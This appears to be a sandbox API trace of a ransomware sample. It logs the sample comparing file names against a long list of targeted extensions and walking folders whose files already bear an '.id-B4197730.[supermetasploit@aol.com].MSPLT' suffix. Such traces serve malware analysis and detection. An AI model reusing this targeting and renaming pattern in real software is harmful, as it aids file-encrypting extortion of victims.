lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0284.016] lstrlenW (lpString=".odb") returned 4 [0284.016] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0284.016] lstrlenW (lpString=".odc") returned 4 [0284.016] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0284.016] lstrlenW (lpString=".odm") returned 4 [0284.016] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0284.016] lstrlenW (lpString=".odp") returned 4 [0284.016] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0284.016] lstrlenW (lpString=".ods") returned 4 [0284.016] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0284.016] lstrlenW (lpString=".oft") returned 4 [0284.016] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0284.016] lstrlenW (lpString=".one") returned 4 [0284.016] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0284.016] lstrlenW (lpString=".onepkg") returned 7 [0284.016] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0284.016] lstrlenW (lpString=".onetoc2") returned 8 [0284.016] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0284.016] lstrlenW (lpString=".opt") returned 4 [0284.016] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0284.016] lstrlenW (lpString=".oqy") returned 4 [0284.016] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0284.016] lstrlenW (lpString=".orf") returned 4 [0284.016] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0284.016] lstrlenW (lpString=".p12") returned 4 [0284.017] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0284.017] lstrlenW (lpString=".p7b") returned 4 [0284.017] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0284.017] lstrlenW (lpString=".p7c") returned 4 [0284.017] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0284.017] lstrlenW (lpString=".pam") returned 4 [0284.017] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0284.017] lstrlenW (lpString=".pbm") returned 4 [0284.017] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0284.017] lstrlenW (lpString=".pct") returned 4 [0284.017] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0284.017] lstrlenW (lpString=".pcx") returned 4 [0284.017] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0284.017] lstrlenW (lpString=".pdd") returned 4 [0284.017] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0284.017] lstrlenW (lpString=".pdf") returned 4 [0284.017] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0284.017] lstrlenW (lpString=".pdp") returned 4 [0284.017] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0284.017] lstrlenW (lpString=".pef") returned 4 [0284.017] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0284.017] lstrlenW (lpString=".pem") returned 4 [0284.017] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0284.017] lstrlenW (lpString=".pff") returned 4 [0284.017] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0284.017] lstrlenW (lpString=".pfm") returned 4 [0284.017] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0284.018] lstrlenW (lpString=".pfx") returned 4 [0284.018] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0284.018] lstrlenW (lpString=".pgm") returned 4 [0284.018] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0284.018] lstrlenW (lpString=".php") returned 4 [0284.018] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0284.018] lstrlenW (lpString=".php3") returned 5 [0284.018] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0284.018] lstrlenW (lpString=".php4") returned 5 [0284.018] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 [0284.018] lstrlenW (lpString=".php5") returned 5 [0284.018] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0284.018] lstrlenW (lpString=".phtml") returned 6 [0284.018] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0284.018] lstrlenW (lpString=".pict") returned 5 [0284.018] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0284.018] lstrlenW (lpString=".pl") returned 3 [0284.018] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0284.018] lstrlenW (lpString=".pls") returned 4 [0284.018] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0284.018] lstrlenW (lpString=".pm") returned 3 [0284.018] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0284.018] lstrlenW (lpString=".png") returned 4 [0284.018] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0284.018] lstrlenW (lpString=".pnm") returned 4 [0284.018] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0284.018] lstrlenW (lpString=".pot") returned 4 [0284.018] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0284.019] lstrlenW (lpString=".potm") returned 5 [0284.019] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned -1 [0284.019] lstrlenW (lpString=".potx") returned 5 [0284.019] lstrcmpiW (lpString1=".potx", lpString2="MSPLT") returned -1 [0284.019] lstrlenW (lpString=".ppa") returned 4 [0284.019] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0284.019] lstrlenW (lpString=".ppam") returned 5 [0284.019] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0284.019] lstrlenW (lpString=".ppm") returned 4 [0284.019] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0284.019] lstrlenW (lpString=".pps") returned 4 [0284.019] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0284.019] lstrlenW (lpString=".ppsm") returned 5 [0284.019] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0284.019] lstrlenW (lpString=".ppt") returned 4 [0284.019] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0284.019] lstrlenW (lpString=".pptm") returned 5 [0284.019] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0284.019] lstrlenW (lpString=".pptx") returned 5 [0284.019] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0284.019] lstrlenW (lpString=".prn") returned 4 [0284.019] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0284.019] lstrlenW (lpString=".ps") returned 3 [0284.019] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0284.019] lstrlenW (lpString=".psb") returned 4 [0284.019] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0284.019] lstrlenW (lpString=".psd") returned 4 [0284.019] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0284.019] lstrlenW (lpString=".pst") returned 4 [0284.020] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0284.020] lstrlenW (lpString=".ptx") returned 4 [0284.020] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0284.020] lstrlenW (lpString=".pub") returned 4 [0284.020] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0284.020] lstrlenW (lpString=".pwm") returned 4 [0284.020] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0284.020] lstrlenW (lpString=".pxr") returned 4 [0284.020] lstrcmpiW (lpString1=".pxr", lpString2="SPLT") returned -1 [0284.020] lstrlenW (lpString=".py") returned 3 [0284.020] lstrcmpiW (lpString1=".py", lpString2="PLT") returned -1 [0284.020] lstrlenW (lpString=".qt") returned 3 [0284.020] lstrcmpiW (lpString1=".qt", lpString2="PLT") returned -1 [0284.020] lstrlenW (lpString=".r3d") returned 4 [0284.020] lstrcmpiW (lpString1=".r3d", lpString2="SPLT") returned -1 [0284.020] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b3624c8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b3624c8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b420fb4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xffd6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0284.020] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b90bdb3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b90bdb3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ba0974a, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3c58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0284.020] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b90bdb3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b90bdb3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ba0974a, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3c58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0284.021] FindClose (in: hFindFile=0x3947f28 | out: hFindFile=0x3947f28) returned 1 [0284.022] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0284.022] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b50939c, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b50939c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1043", cAlternateFileName="")) returned 1 [0284.022] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0284.022] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b50939c, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b50939c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948328 [0284.023] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b50939c, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b50939c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.023] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b0b3ac1, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b0b3ac1, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b3624c8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xec4, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0284.023] lstrlenW (lpString="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 52 [0284.024] lstrlenW (lpString=".1cd") returned 4 [0284.024] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0284.024] lstrlenW (lpString=".3ds") returned 4 [0284.024] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0284.024] lstrlenW (lpString=".3fr") returned 4 [0284.024] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0284.024] lstrlenW (lpString=".3g2") returned 4 [0284.024] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0284.024] lstrlenW (lpString=".3gp") returned 4 [0284.024] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0284.024] lstrlenW (lpString=".7z") returned 3 [0284.024] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0284.024] lstrlenW (lpString=".accda") returned 6 [0284.024] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0284.024] lstrlenW (lpString=".accdb") returned 6 [0284.024] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0284.024] lstrlenW (lpString=".accdc") returned 6 [0284.024] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0284.024] lstrlenW (lpString=".accde") returned 6 [0284.024] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0284.024] lstrlenW (lpString=".accdt") returned 6 [0284.025] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0284.025] lstrlenW (lpString=".accdw") returned 6 [0284.025] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0284.025] lstrlenW (lpString=".adb") returned 4 [0284.025] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0284.025] lstrlenW (lpString=".adp") returned 4 [0284.025] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0284.025] lstrlenW (lpString=".ai") returned 3 [0284.025] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0284.025] lstrlenW (lpString=".ai3") returned 4 [0284.025] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0284.025] lstrlenW (lpString=".ai4") returned 4 [0284.025] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0284.025] lstrlenW (lpString=".ai5") returned 4 [0284.025] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0284.025] lstrlenW (lpString=".ai6") returned 4 [0284.025] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0284.025] lstrlenW (lpString=".ai7") returned 4 [0284.025] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0284.025] lstrlenW (lpString=".ai8") returned 4 [0284.025] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0284.025] lstrlenW (lpString=".anim") returned 5 [0284.026] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0284.026] lstrlenW (lpString=".arw") returned 4 [0284.026] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0284.026] lstrlenW (lpString=".as") returned 3 [0284.026] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0284.026] lstrlenW (lpString=".asa") returned 4 [0284.026] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0284.026] lstrlenW (lpString=".asc") returned 4 [0284.026] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0284.026] lstrlenW (lpString=".ascx") returned 5 [0284.026] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0284.026] lstrlenW (lpString=".asm") returned 4 [0284.026] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0284.026] lstrlenW (lpString=".asmx") returned 5 [0284.026] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0284.026] lstrlenW (lpString=".asp") returned 4 [0284.026] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0284.026] lstrlenW (lpString=".aspx") returned 5 [0284.026] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0284.026] lstrlenW (lpString=".asr") returned 4 [0284.026] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0284.026] lstrlenW (lpString=".asx") returned 4 [0284.026] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0284.026] lstrlenW (lpString=".avi") returned 4 [0284.026] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0284.026] lstrlenW (lpString=".avs") returned 4 [0284.027] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0284.027] lstrlenW (lpString=".backup") returned 7 [0284.027] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0284.027] lstrlenW (lpString=".bak") returned 4 [0284.027] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0284.027] lstrlenW (lpString=".bay") returned 4 [0284.027] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0284.027] lstrlenW (lpString=".bd") returned 3 [0284.027] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0284.027] lstrlenW (lpString=".bin") returned 4 [0284.027] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0284.027] lstrlenW (lpString=".bmp") returned 4 [0284.027] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0284.027] lstrlenW (lpString=".bz2") returned 4 [0284.027] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0284.027] lstrlenW (lpString=".c") returned 2 [0284.027] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0284.027] lstrlenW (lpString=".cdr") returned 4 [0284.027] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0284.027] lstrlenW (lpString=".cer") returned 4 [0284.027] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0284.027] lstrlenW (lpString=".cf") returned 3 [0284.027] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0284.027] lstrlenW (lpString=".cfc") returned 4 [0284.027] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0284.027] lstrlenW (lpString=".cfm") returned 4 [0284.027] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0284.028] lstrlenW (lpString=".cfml") returned 5 [0284.028] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0284.028] lstrlenW (lpString=".cfu") returned 4 [0284.028] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0284.028] lstrlenW (lpString=".chm") returned 4 [0284.028] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0284.028] lstrlenW (lpString=".cin") returned 4 [0284.028] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0284.028] lstrlenW (lpString=".class") returned 6 [0284.028] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0284.028] lstrlenW (lpString=".clx") returned 4 [0284.028] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0284.028] lstrlenW (lpString=".config") returned 7 [0284.028] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0284.028] lstrlenW (lpString=".cpp") returned 4 [0284.028] lstrcmpiW (lpString1=".cpp", lpString2="SPLT") returned -1 [0284.028] lstrlenW (lpString=".cr2") returned 4 [0284.028] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0284.028] lstrlenW (lpString=".crt") returned 4 [0284.028] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0284.028] lstrlenW (lpString=".crw") returned 4 [0284.028] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0284.028] lstrlenW (lpString=".cs") returned 3 [0284.028] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0284.028] lstrlenW (lpString=".css") returned 4 [0284.028] lstrcmpiW (lpString1=".css", lpString2="SPLT") returned -1 [0284.029] lstrlenW (lpString=".csv") returned 4 [0284.029] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0284.029] lstrlenW (lpString=".cub") returned 4 [0284.029] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0284.029] lstrlenW (lpString=".dae") returned 4 [0284.029] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0284.029] lstrlenW (lpString=".dat") returned 4 [0284.029] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0284.029] lstrlenW (lpString=".db") returned 3 [0284.029] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0284.029] lstrlenW (lpString=".dbf") returned 4 [0284.029] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0284.029] lstrlenW (lpString=".dbx") returned 4 [0284.029] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0284.029] lstrlenW (lpString=".dc3") returned 4 [0284.029] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0284.029] lstrlenW (lpString=".dcm") returned 4 [0284.029] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0284.029] lstrlenW (lpString=".dcr") returned 4 [0284.029] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0284.029] lstrlenW (lpString=".der") returned 4 [0284.029] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0284.029] lstrlenW (lpString=".dib") returned 4 [0284.029] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0284.029] lstrlenW (lpString=".dic") returned 4 [0284.030] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0284.030] lstrlenW (lpString=".dif") returned 4 [0284.030] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0284.030] lstrlenW (lpString=".divx") returned 5 [0284.030] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0284.030] lstrlenW (lpString=".djvu") returned 5 [0284.030] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0284.030] lstrlenW (lpString=".dng") returned 4 [0284.030] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0284.030] lstrlenW (lpString=".doc") returned 4 [0284.030] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0284.030] lstrlenW (lpString=".docm") returned 5 [0284.030] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0284.030] lstrlenW (lpString=".docx") returned 5 [0284.030] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0284.030] lstrlenW (lpString=".dot") returned 4 [0284.030] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0284.030] lstrlenW (lpString=".dotm") returned 5 [0284.030] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0284.030] lstrlenW (lpString=".dotx") returned 5 [0284.030] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0284.030] lstrlenW (lpString=".dpx") returned 4 [0284.030] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0284.030] lstrlenW (lpString=".dqy") returned 4 [0284.030] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0284.031] lstrlenW (lpString=".dsn") returned 4 [0284.031] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0284.031] lstrlenW (lpString=".dt") returned 3 [0284.031] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0284.031] lstrlenW (lpString=".dtd") returned 4 [0284.031] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0284.031] lstrlenW (lpString=".dwg") returned 4 [0284.031] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0284.031] lstrlenW (lpString=".dwt") returned 4 [0284.031] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0284.031] lstrlenW (lpString=".dx") returned 3 [0284.031] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0284.031] lstrlenW (lpString=".dxf") returned 4 [0284.031] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0284.031] lstrlenW (lpString=".edml") returned 5 [0284.031] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0284.031] lstrlenW (lpString=".efd") returned 4 [0284.031] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0284.031] lstrlenW (lpString=".elf") returned 4 [0284.031] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0284.031] lstrlenW (lpString=".emf") returned 4 [0284.031] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0284.031] lstrlenW (lpString=".emz") returned 4 [0284.031] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0284.031] lstrlenW (lpString=".epf") returned 4 [0284.031] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0284.031] lstrlenW (lpString=".eps") returned 4 [0284.031] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0284.032] lstrlenW (lpString=".epsf") returned 5 [0284.032] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0284.032] lstrlenW (lpString=".epsp") returned 5 [0284.032] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0284.032] lstrlenW (lpString=".erf") returned 4 [0284.032] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0284.032] lstrlenW (lpString=".exr") returned 4 [0284.032] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned -1 [0284.032] lstrlenW (lpString=".f4v") returned 4 [0284.032] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0284.032] lstrlenW (lpString=".fido") returned 5 [0284.032] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0284.032] lstrlenW (lpString=".flm") returned 4 [0284.032] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0284.032] lstrlenW (lpString=".flv") returned 4 [0284.032] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0284.032] lstrlenW (lpString=".frm") returned 4 [0284.032] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0284.032] lstrlenW (lpString=".fxg") returned 4 [0284.032] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0284.032] lstrlenW (lpString=".geo") returned 4 [0284.032] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0284.032] lstrlenW (lpString=".gif") returned 4 [0284.032] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0284.032] lstrlenW (lpString=".grs") returned 4 [0284.032] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0284.032] lstrlenW (lpString=".gz") returned 3 [0284.032] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0284.032] lstrlenW (lpString=".h") returned 2 [0284.033] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0284.033] lstrlenW (lpString=".hdr") returned 4 [0284.033] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0284.033] lstrlenW (lpString=".hpp") returned 4 [0284.033] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0284.033] lstrlenW (lpString=".hta") returned 4 [0284.033] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0284.033] lstrlenW (lpString=".htc") returned 4 [0284.033] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0284.033] lstrlenW (lpString=".htm") returned 4 [0284.033] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0284.033] lstrlenW (lpString=".html") returned 5 [0284.033] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0284.033] lstrlenW (lpString=".icb") returned 4 [0284.033] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0284.033] lstrlenW (lpString=".ics") returned 4 [0284.033] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0284.033] lstrlenW (lpString=".iff") returned 4 [0284.033] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0284.033] lstrlenW (lpString=".inc") returned 4 [0284.033] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0284.033] lstrlenW (lpString=".indd") returned 5 [0284.033] lstrcmpiW 